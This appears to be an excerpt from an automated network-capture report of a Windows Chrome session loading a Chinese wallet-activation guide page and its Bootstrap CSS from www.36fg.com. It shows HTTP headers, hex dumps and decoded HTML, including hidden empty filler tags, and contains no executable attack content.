                                                        2025-03-15 00:17:53 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 61 63 74 69 76 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e e9 a6 96 e9 a1 b5 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 23 61 62 6f 75 74 22 3e e5 85 b3 e4 ba 8e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 23 73 65 72 76 69 63 65 22 3e e6 9c 8d e5 8a a1 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: <li class="active"><a href="/"></a></li> <li><a href="/#about"></a></li> <li><a href="/#service"></a></li>
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 0a 20 20 20 20 3c 2f 68 65 61 64 65 72 3e 0a 20 20 20 20 3c 21 2d 2d 20 68 65 61 64 65 72 20 61 72 65 61 20 65 6e 64 20 2d 2d 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 64 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 65 6d 20 64 72 6f 70 7a 6f 6e 65 3d 22 62 68 76 63 22 3e 3c 65 6d 20 64 72 6f 70 7a 6f 6e 65 3d 22 7a 35 76 36 22 3e 3c 2f 65 6d 3e 3c 70 72 65 20 64 61 74 65 2d 74 69 6d 65 3d 22 35 30 75 5f 22 3e 3c 2f 70 72 65 3e 3c 61 63 72 6f 6e 79 6d 20 64 72 61 67 67 61 62 6c 65 3d 22 68 70 63 69 22 3e 3c 2f 61 63 72 6f 6e 79 6d 3e 3c 6e 6f 66 72 61 6d 65 73 20 64 72 6f 70 7a 6f 6e 65 3d 22 5f 67 6c 5f 22 3e 3c 2f 6e 6f 66 72 61 6d 65 73 3e 3c 75 20 69 64 3d 22 67 64 6c 64 22 3e 3c 2f 75 3e 3c 73 6d 61 6c 6c 20 64 61 74 65 2d 74 69 6d
                                                        Data Ascii: </header> ... header area end --> <div class="ddnone"> <em dropzone="bhvc"><em dropzone="z5v6"></em><pre date-time="50u_"></pre><acronym draggable="hpci"></acronym><noframes dropzone="_gl_"></noframes><u id="gdld"></u><small date-tim
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 64 61 74 65 2d 74 69 6d 65 3d 22 61 72 72 74 22 3e 3c 2f 70 72 65 3e 3c 65 6d 20 64 72 6f 70 7a 6f 6e 65 3d 22 6d 6c 61 36 22 3e 3c 2f 65 6d 3e 3c 61 64 64 72 65 73 73 20 69 64 3d 22 75 37 65 66 22 3e 3c 2f 61 64 64 72 65 73 73 3e 3c 6b 62 64 20 69 64 3d 22 66 5f 64 33 22 3e 3c 2f 6b 62 64 3e 3c 61 63 72 6f 6e 79 6d 20 64 72 6f 70 7a 6f 6e 65 3d 22 74 61 36 33 22 3e 3c 2f 61 63 72 6f 6e 79 6d 3e 3c 63 6f 64 65 20 64 72 61 67 67 61 62 6c 65 3d 22 30 6e 64 78 22 3e 3c 2f 63 6f 64 65 3e 3c 75 6c 20 6c 61 6e 67 3d 22 34 6c 67 73 22 3e 3c 2f 75 6c 3e 3c 61 72 65 61 20 69 64 3d 22 71 31 71 70 22 3e 3c 2f 61 72 65 61 3e 3c 6e 6f 66 72 61 6d 65 73 20 64 69 72 3d 22 31 67 39 67 22 3e 3c 2f 6e 6f 66 72 61 6d 65 73 3e 3c 66 6f 6e 74 20 64 69 72 3d 22 30 79 76 35 22
                                                        Data Ascii: date-time="arrt"></pre><em dropzone="mla6"></em><address id="u7ef"></address><kbd id="f_d3"></kbd><acronym dropzone="ta63"></acronym><code draggable="0ndx"></code><ul lang="4lgs"></ul><area id="q1qp"></area><noframes dir="1g9g"></noframes><font dir="0yv5"
                                                        2025-03-15 00:17:53 UTC877INData Raw: 69 70 74 3e 3c 65 6d 20 64 72 61 67 67 61 62 6c 65 3d 22 6c 32 62 78 64 39 22 3e 3c 2f 65 6d 3e 3c 64 6c 20 64 69 72 3d 22 7a 36 6f 37 68 79 22 3e 3c 2f 64 6c 3e 3c 65 6d 20 64 72 6f 70 7a 6f 6e 65 3d 22 6b 65 6c 34 76 77 22 3e 3c 2f 65 6d 3e 3c 64 6c 20 64 69 72 3d 22 64 5f 71 75 61 71 22 3e 3c 2f 64 6c 3e 3c 73 74 72 6f 6e 67 20 6c 61 6e 67 3d 22 6a 76 67 73 72 7a 22 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 70 72 65 20 64 72 6f 70 7a 6f 6e 65 3d 22 69 6d 70 36 32 67 22 3e 3c 2f 70 72 65 3e 3c 75 20 6c 61 6e 67 3d 22 73 66 73 36 74 64 22 3e 3c 2f 75 3e 3c 62 20 64 69 72 3d 22 5f 5f 64 76 64 65 22 3e 3c 2f 62 3e 3c 65 6d 20 64 61 74 65 2d 74 69 6d 65 3d 22 65 74 72 36 6b 6b 22 3e 3c 2f 65 6d 3e 3c 70 72 65 20 69 64 3d 22 63 66 73 74 79 77 22 3e 3c 2f 70 72 65 3e
                                                        Data Ascii: ipt><em draggable="l2bxd9"></em><dl dir="z6o7hy"></dl><em dropzone="kel4vw"></em><dl dir="d_quaq"></dl><strong lang="jvgsrz"></strong><pre dropzone="imp62g"></pre><u lang="sfs6td"></u><b dir="__dvde"></b><em date-time="etr6kk"></em><pre id="cfstyw"></pre>
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 33 66 66 64 0d 0a 3c 74 69 6d 65 20 64 72 61 67 67 61 62 6c 65 3d 22 76 31 63 7a 72 6f 22 3e 3c 2f 74 69 6d 65 3e 3c 65 6d 20 64 69 72 3d 22 35 75 72 6e 67 67 22 3e 3c 2f 65 6d 3e 3c 62 20 6c 61 6e 67 3d 22 62 68 6b 65 63 73 22 3e 3c 2f 62 3e 3c 62 69 67 20 69 64 3d 22 62 6d 79 75 66 6f 22 3e 3c 2f 62 69 67 3e 3c 61 63 72 6f 6e 79 6d 20 64 72 61 67 67 61 62 6c 65 3d 22 33 36 33 35 6a 76 22 3e 3c 2f 61 63 72 6f 6e 79 6d 3e 3c 75 6c 20 64 69 72 3d 22 72 31 74 69 79 6a 22 3e 3c 2f 75 6c 3e 3c 62 64 6f 20 64 69 72 3d 22 67 71 32 32 63 68 22 3e 3c 2f 62 64 6f 3e 3c 70 72 65 20 64 69 72 3d 22 67 71 75 69 67 5f 22 3e 3c 2f 70 72 65 3e 3c 69 6e 73 20 6c 61 6e 67 3d 22 32 75 7a 6d 69 31 22 3e 3c 2f 69 6e 73 3e 3c 74 74 20 6c 61 6e 67 3d 22 6b 72 64 6f 72 38 22 3e
                                                        Data Ascii: 3ffd<time draggable="v1czro"></time><em dir="5urngg"></em><b lang="bhkecs"></b><big id="bmyufo"></big><acronym draggable="3635jv"></acronym><ul dir="r1tiyj"></ul><bdo dir="gq22ch"></bdo><pre dir="gquig_"></pre><ins lang="2uzmi1"></ins><tt lang="krdor8">
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 20 69 64 3d 22 75 35 61 66 63 61 22 3e 3c 2f 61 64 64 72 65 73 73 3e 3c 73 74 72 6f 6e 67 20 64 69 72 3d 22 5f 61 6d 77 61 71 22 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 6f 6c 20 6c 61 6e 67 3d 22 68 35 74 76 63 69 22 3e 3c 2f 6f 6c 3e 3c 6c 65 67 65 6e 64 20 64 72 6f 70 7a 6f 6e 65 3d 22 33 71 68 37 77 64 22 3e 3c 2f 6c 65 67 65 6e 64 3e 3c 6f 6c 20 69 64 3d 22 6e 33 32 71 6f 30 22 3e 3c 2f 6f 6c 3e 3c 6f 6c 20 69 64 3d 22 62 6a 75 72 33 35 22 3e 3c 2f 6f 6c 3e 3c 64 65 6c 20 64 61 74 65 2d 74 69 6d 65 3d 22 68 37 6a 39 33 78 22 3e 3c 2f 64 65 6c 3e 3c 64 66 6e 20 6c 61 6e 67 3d 22 66 72 33 73 6f 69 22 3e 3c 2f 64 66 6e 3e 3c 66 6f 6e 74 20 64 72 6f 70 7a 6f 6e 65 3d 22 37 75 77 66 31 33 22 3e 3c 2f 66 6f 6e 74 3e 3c 74 69 6d 65 20 64 61 74 65 2d 74 69 6d 65 3d
                                                        Data Ascii: id="u5afca"></address><strong dir="_amwaq"></strong><ol lang="h5tvci"></ol><legend dropzone="3qh7wd"></legend><ol id="n32qo0"></ol><ol id="bjur35"></ol><del date-time="h7j93x"></del><dfn lang="fr3soi"></dfn><font dropzone="7uwf13"></font><time date-time=
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 6c 6c 65 74 e8 b4 a6 e6 88 b7 e6 bf 80 e6 b4 bb e6 8c 87 e5 8d 97 ef bc 9a e8 a7 a3 e5 86 b3 e2 80 9c e6 82 a8 e7 9a 84 e8 b4 a6 e6 88 b7 e5 b0 9a e6 9c aa e6 bf 80 e6 b4 bb e2 80 9d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 48 6f 6d 65 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: llet</h2> <ul class="breadcrumb justify-content-center"> <li class="breadcrumb-item"><a href="/" title="Home">Home</a></li>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.549733104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:53 UTC625OUTGET /static/css/bootstrap.min.css HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:53 UTC994INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:53 GMT
                                                        Content-Type: text/css
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:30 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae72-2268b"
                                                        expires: Sat, 15 Mar 2025 02:28:22 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 35376
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0vzhypG0%2F%2FdXOcY86thu5XEWUST08f0xV3Gc6lpf6m6kN%2BWZtoazkv%2BVSr1rWMLVRP6tUGpzT33IEk1cxLBz8pX9ZI%2FTpbpn2%2FmgvrNZWq6zqTnqXJlfW8xXY%2FsGUI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d497d95bb2c0-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1956&rtt_var=741&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1197&delivery_rate=1469552&cwnd=220&unsent_bytes=0&cid=92d449c2b7550e3d&ts=553&x=0"
                                                        2025-03-15 00:17:53 UTC375INData Raw: 37 63 39 34 0d 0a ef bb bf 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23
                                                        Data Ascii: 7c94/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d 2d 77 68 69 74 65 3a 23 66 66 66 3b 2d 2d 67 72 61 79 3a 23 36 63 37 35 37 64 3b 2d 2d 67 72 61 79 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37
                                                        Data Ascii: cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:7
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d
                                                        Data Ascii: n-bottom:1rem}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{m
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 6c 69 67 6e 3a 6c 65 66 74 3b 63 61 70 74 69 6f 6e 2d 73 69 64 65 3a 62 6f 74 74 6f 6d 7d 74 68 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 69 6e 68 65 72 69 74 7d 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a
                                                        Data Ascii: lign:left;caption-side:bottom}th{text-align:inherit}label{display:inline-block;margin-bottom:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 70 75 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 68 31 2c 2e 68 32 2c 2e 68 33 2c 2e 68 34 2c 2e 68 35 2c 2e 68 36 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 2c 68 31 7b
                                                        Data Ascii: put{display:inline-block}summary{display:list-item;cursor:pointer}template{display:none}[hidden]{display:none!important}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 65 6d 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 66 69 67 75 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 66 69 67 75 72 65 2d 69 6d 67 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 2e 66 69 67 75 72 65 2d 63 61 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 39 30 25 3b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 65 38 33 65 38 63 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74
                                                        Data Ascii: em;max-width:100%;height:auto}.figure{display:inline-block}.figure-img{margin-bottom:.5rem;line-height:1}.figure-caption{font-size:90%;color:#6c757d}code{font-size:87.5%;color:#e83e8c;word-break:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 2d 6c 67 2d 37 2c 2e 63 6f 6c 2d 6c 67 2d 38 2c 2e 63 6f 6c 2d 6c 67 2d 39 2c 2e 63 6f 6c 2d 6c 67 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 6d 64 2c 2e 63 6f 6c 2d 6d 64 2d 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 30 2c 2e 63 6f 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e
                                                        Data Ascii: -lg-7,.col-lg-8,.col-lg-9,.col-lg-auto,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 6c 2d 31 31 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 31 32 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 66 69 72 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 6c 61 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 30 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 31 7b 2d 6d 73 2d 66 6c 65 78
                                                        Data Ascii: l-11{-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-12{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-first{-ms-flex-order:-1;order:-1}.order-last{-ms-flex-order:13;order:13}.order-0{-ms-flex-order:0;order:0}.order-1{-ms-flex
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 30 20 32 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 32 35 25 7d 2e 63 6f 6c 2d 73 6d 2d 34 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 35 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 34 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 34 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 36 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 63 6f 6c 2d 73 6d 2d 37 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33
                                                        Data Ascii: 0 25%;max-width:25%}.col-sm-4{-ms-flex:0 0 33.333333%;flex:0 0 33.333333%;max-width:33.333333%}.col-sm-5{-ms-flex:0 0 41.666667%;flex:0 0 41.666667%;max-width:41.666667%}.col-sm-6{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}.col-sm-7{-ms-flex:0 0 58.33333
                                                        2025-03-15 00:17:53 UTC1369INData Raw: 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 36 37 25 7d 7d 40 6d 65 64 69 61 20
                                                        Data Ascii: 33333%}.offset-sm-5{margin-left:41.666667%}.offset-sm-6{margin-left:50%}.offset-sm-7{margin-left:58.333333%}.offset-sm-8{margin-left:66.666667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.333333%}.offset-sm-11{margin-left:91.666667%}}@media


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.549735104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:54 UTC620OUTGET /static/css/meanmenu.css HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
